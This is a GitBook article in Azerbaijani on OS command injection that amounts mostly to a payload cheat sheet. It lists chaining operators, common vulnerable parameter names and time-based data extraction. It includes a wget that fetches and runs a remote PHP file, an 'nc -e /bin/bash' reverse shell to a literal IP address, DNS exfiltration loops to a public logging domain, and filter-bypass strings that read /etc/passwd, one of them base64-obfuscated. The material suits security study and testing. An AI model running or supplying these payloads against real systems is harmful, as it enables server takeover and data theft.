Məqalələr
  • Yeni başlayanlar üçün Kibertəhlükəsizlik üzrə Mükəmməl Bələdçi
  • Security in Cloud Computing | Bulud Hesablamada Təhlükəsizlik
  • XDR(Cross-layered Detection and Response) nədir?
  • Şəbəkəyə Giriş-#1 Bu Günlərdə Şəbəkə
  • eWPT İmtahanına Hazırlıq
  • eJPT İmtahanına Hazırlıq
  • Application Control nədir?
  • Linuxda Hadoop-un Quraşdırılması
  • eWPT Cheat Sheet
  • IDOR Açığı
  • HTTP - Status Codes
  • HTTP - URL Encoding
  • HTTP - Mesaj Nümunələri
  • HTTP - Ümumi Baxış
  • Kibertəhlükəsizlik üçün öyrənmək üçün 5 ən yaxşı proqramlaşdırma dili
  • Dark Web haqqında hər şey
  • DDoS hücumu
  • Botnet nədir?
  • Google Play-də 2 milyon yüklənməsi olan Android malware tətbiqləri aşkarlanıb
  • Kibertəhlükəsizlik üçün ən yaxşı YouTube kanalları
  • Server Side Template Injection(SSTI) nədir?
  • Command Injection
  • Kibertəhlükəsizliyi öyrənmək üçün ən yaxşı 10 səbəb
  • 2FA üçün Bug Bounty Checklist Siyahısı
  • Zero-day(0day) nədir?
  • Session və Cookie arasında fərq nədir?
  • Application Security Testing nədir ?
  • Phishing nədir?
  • Şəbəkədə statefull və stateless anlayışı
  • SQL injection nədir?
  • Active Directory: Terminologiyaya bələdçilik, Təsnifatlar & Əsaslar!
  • Active Directory Hücumları
  • Şəbəkə təhlükəsizliyində istifadə olunan cihazlar və praktiki tətbiqi
  • Şəbəkə Təhlükəsizliyi Və Şəbəkə Təhlükəsizliyində İstifadə Olunan Cihazlar
  • ƏN MƏŞHUR HACKER QRUPLARI VƏ HÜCUMLARI HAQQINDA
  • ƏN MƏŞHUR HACKER QRUPLARI VƏ HÜCUMLARI
  • Bug Bounty-ə başlamaq istəyənlər üçün detallı yol xəritəsi
  • Broken Access Control qarşısını necə almaq olar?
  • Command Injection Zəifliyi Nədir? Və bunun qarşısını necə almaq olar?
  • SQL Injection Attack Nümunəsi Və Qarşısının Alınması
  • Wireless attacks notes
Powered by GitBook
On this page
  • Command injection nədir?
  • Kontekst
  • Command Injection/Execution
  • Sadəcə unix dəstəkləyən
  • Məsələn
  • Parametrlər
  • Zamana əsaslanan məlumatların çıxarılması
  • DNS əsaslı məlumatların eksfiltrasiyası
  • DNS əsaslı məlumatların eksfiltrasiyasını yoxlamaq üçün onlayn alətlər:
  • Filtering bypass
  • Linux ücün

Was this helpful?

Command Injection

Müəllif : Zaur Qasımov

PreviousServer Side Template Injection(SSTI) nədir?NextKibertəhlükəsizliyi öyrənmək üçün ən yaxşı 10 səbəb

Last updated 2 years ago

Was this helpful?

Command injection nədir?

OS command injection (həmçinin shell injection kimi tanınır) təcavüzkara tətbiqi idarə edən serverdə ixtiyari əməliyyat sistemi (ƏS) əmrlərini yerinə yetirməyə imkan verən və adətən tətbiqi və onun bütün məlumatlarını tamamilə pozmağa imkan verən veb təhlükəsizlik zəifliyidir.

Kontekst

Daxil etdiyiniz yerdən asılı olaraq, əmrlərdən əvvəl sitat gətirilən konteksti (" və ya ' istifadə edilmiş) dayandırmalısınız.

Command Injection/Execution

Unix və Windows-u dəstəkləyən

ls||id; ls ||id; ls|| id; ls || id
ls|id; ls |id; ls| id; ls | id
ls&&id; ls &&id; ls&& id; ls && id
ls&id; ls &id; ls& id; ls & id
ls %0A id # %0A

Sadəcə unix dəstəkləyən

`ls`
$(ls) # $()
ls; id
ls${LS_COLORS:10:1}${IFS}id
> /var/www/html/out.txt
< /etc/passwd

Məsələn

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parametrlər

Kod inyeksiyasına və oxşar RCE zəifliklərinə qarşı həssas ola biləcək ən yaxşı 25 parametr bunlardır:

?cmd={payload} ?exec={payload} ?command={payload}
?execute{payload} ?ping={payload} ?query={payload}
?jump={payload} ?code={payload} ?reg={payload}
?do={payload} ?func={payload} ?arg={payload}
?option={payload} ?load={payload} ?process={payload}
?step={payload} ?read={payload} ?function={payload}
?req={payload} ?feature={payload}

Zamana əsaslanan məlumatların çıxarılması

Məlumatların çıxarılması:char by char

millisec@lab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
millisec@lab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s

DNS əsaslı məlumatların eksfiltrasiyası

http://dnsbin.zhack.ca/ ünvanına keçin
Sadə "ls" yerinə yetirin
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

DNS əsaslı məlumatların eksfiltrasiyasını yoxlamaq üçün onlayn alətlər:

dnsbin.zhack.ca pingb.in

Filtering bypass

Windows üçün

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calca

Linux ücün

Bypass backslash və slash

cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Bypass pipes

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)